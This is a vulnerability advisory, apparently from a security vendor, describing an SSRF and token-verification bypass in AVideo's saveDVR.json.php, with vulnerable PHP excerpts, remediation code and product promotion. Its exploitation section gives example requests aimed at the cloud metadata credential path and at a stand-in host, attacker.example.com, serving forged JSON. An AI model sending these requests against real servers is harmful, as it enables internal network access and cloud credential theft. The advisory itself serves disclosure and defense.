CVE-2026-33351

CVE-2026-33351 is a critical-severity server-side request forgery (SSRF) vulnerability in wwbn/avideo (composer), affecting versions <= 26.0. No fixed version is listed yet.

Summary

A Server-Side Request Forgery (SSRF) vulnerability exists in plugin/Live/standAloneFiles/saveDVR.json.php. When the AVideo Live plugin is deployed in standalone mode (the intended configuration for this file), the $_REQUEST['webSiteRootURL'] parameter is used directly to construct a URL that is fetched server-side via file_get_contents(). No authentication, origin validation, or URL allowlisting is performed.

Affected Component

File: plugin/Live/standAloneFiles/saveDVR.json.php, lines 5-28

$streamerURL = ""; // change it to your streamer URL

$configFile = '../../../videos/configuration.php';
if (file_exists($configFile)) {
    include_once $configFile;
    $streamerURL = $global['webSiteRootURL'];
}

if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {
    $streamerURL = $_REQUEST['webSiteRootURL'];   // ATTACKER-CONTROLLED
}

// ...

$verifyURL = "{$streamerURL}plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php?saveDVR={$_REQUEST['saveDVR']}";
$result = file_get_contents($verifyURL);           // SSRF

Root Cause

  1. User-controlled URL base: When the configuration file does not exist (standalone deployment), $streamerURL is set directly from $_REQUEST['webSiteRootURL'] with no validation.
  2. No URL allowlisting or scheme restriction: The value is used as-is in a file_get_contents() call. There is no check for http/https scheme only, no private IP blocking, and no domain allowlist.
  3. Verification bypass by design: The token verification URL is constructed using the attacker-controlled base URL. The attacker can point it to their own server, which returns a JSON response that passes all validation checks, effectively bypassing authentication.

Exploitation

Part 1: Basic SSRF (Internal Network Access)

POST /plugin/Live/standAloneFiles/saveDVR.json.php
Content-Type: application/x-www-form-urlencoded

webSiteRootURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/&saveDVR=anything

The server fetches:

http://169.254.169.254/latest/meta-data/iam/security-credentials/plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php?saveDVR=anything

While the appended path may cause a 404 on the metadata service, the attacker can also use this for:

  • Internal port scanning: webSiteRootURL=http://192.168.1.X:PORT/, differentiate open/closed ports by response time and error messages.
  • Internal service access: webSiteRootURL=http://internal-service/, reach services behind the firewall.
  • Cloud metadata access: With URL path manipulation or by hosting a redirect on the attacker server.

Part 2: Verification Bypass + Downstream Command Execution Chain

This is the more severe attack chain:

  1. The attacker sets up a server at https://attacker.example.com/ with the path:

    /plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php
    

    That returns:

    {"error": false, "response": {"key": "attacker_controlled_value"}}
    
  2. The attacker sends:

    POST /plugin/Live/standAloneFiles/saveDVR.json.php
    
    webSiteRootURL=https://attacker.example.com/&saveDVR=anything
    
  3. The server fetches the verification URL from the attacker's server, receives the forged valid response, and proceeds to process it.

  4. The key value from the response flows into shell commands:

    • Line 55: $DVRFile = "{$hls_path}{$key}";, used in exec() at line 80 (though escapeshellarg() is applied to the path components)
    • Line 72: $DVRFileTarget = "{$tmpDVRDir}" . DIRECTORY_SEPARATOR . "{$key}.m3u8";, used without escapeshellarg() in:
      • Line 119: exec("echo \"{$endLine}\" >> {$DVRFileTarget}");
      • Line 157: exec("ffmpeg -i {$DVRFileTarget} -c copy -bsf:a aac_adtstoasc {$filename} -y");
      • Line 167: exec("rm -R {$tmpDVRDir}");

    The $key is sanitized at line 47 with preg_replace("/[^0-9a-z_:-]/i", "", $key), which limits characters to alphanumerics, underscores, colons, and hyphens. This blocks most command injection payloads. However:

    • The SSRF itself (Part 1) is independently exploitable regardless of the downstream chain.
    • The verification bypass grants the attacker control over the processing flow even if direct OS command injection is constrained by the regex.
    • The colon character (:) is allowed by the regex and has special meaning in some shell contexts and FFmpeg input specifiers.

Impact

  • SSRF: The server can be used as a proxy to scan and access internal network resources, cloud metadata endpoints, and other services not intended to be publicly accessible.
  • Authentication Bypass: The DVR token verification is completely bypassed by redirecting the check to an attacker-controlled server.
  • Potential Command Execution: While the regex on $key limits direct shell injection, the attacker gains control over file paths and FFmpeg input specifiers, which could be leveraged for further exploitation depending on the environment.
  • Information Disclosure: Error messages at lines 31-32 reflect the fetched URL and its content, potentially leaking information about internal infrastructure.

Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.

CVE-2026-33351 has a CVSS score of 9.1 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

wwbn/avideo (<= 26.0)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

  1. Remove the user-controlled webSiteRootURL fallback entirely. Require $streamerURL to be configured in the file or via the configuration file. If a fallback is necessary, validate it against a strict allowlist:

    // Remove this block:
    // if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {
    //     $streamerURL = $_REQUEST['webSiteRootURL'];
    // }
    
    // If $streamerURL is still empty, abort:
    if (empty($streamerURL)) {
        error_log("saveDVR: streamerURL is not configured");
        die('saveDVR: Server not configured');
    }
    
  2. If the parameter must remain for backward compatibility, validate it:

    if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {
        $url = filter_var($_REQUEST['webSiteRootURL'], FILTER_VALIDATE_URL);
        if ($url && preg_match('/^https?:\/\//i', $url)) {
            // Resolve hostname and block private/reserved IPs
            $host = parse_url($url, PHP_URL_HOST);
            $ip = gethostbyname($host);
            if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
                die('saveDVR: Invalid URL');
            }
            $streamerURL = $url;
        }
    }
    
  3. Apply escapeshellarg() to all variables used in exec() calls, including $DVRFileTarget at lines 119, 157, and $tmpDVRDir at line 167.

Frequently Asked Questions

  1. What is CVE-2026-33351? CVE-2026-33351 is a critical-severity server-side request forgery (SSRF) vulnerability in wwbn/avideo (composer), affecting versions <= 26.0. No fixed version is listed yet. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
  2. How severe is CVE-2026-33351? CVE-2026-33351 has a CVSS score of 9.1 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-33351? wwbn/avideo (composer) versions <= 26.0 is affected.
  4. Is there a fix for CVE-2026-33351? No fixed version is listed for CVE-2026-33351 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is CVE-2026-33351 exploitable, and should I be worried? Whether CVE-2026-33351 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-33351 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-33351? No fixed version is listed yet. In the interim: Validate and restrict destination URLs against an allowlist. Block requests to private IP ranges and cloud metadata endpoints.

Other vulnerabilities in wwbn/avideo

CVE-2026-33731CVE-2026-33692CVE-2026-33684CVE-2026-54458CVE-2026-50183

Stop the waste.
Protect your environment with Kodem.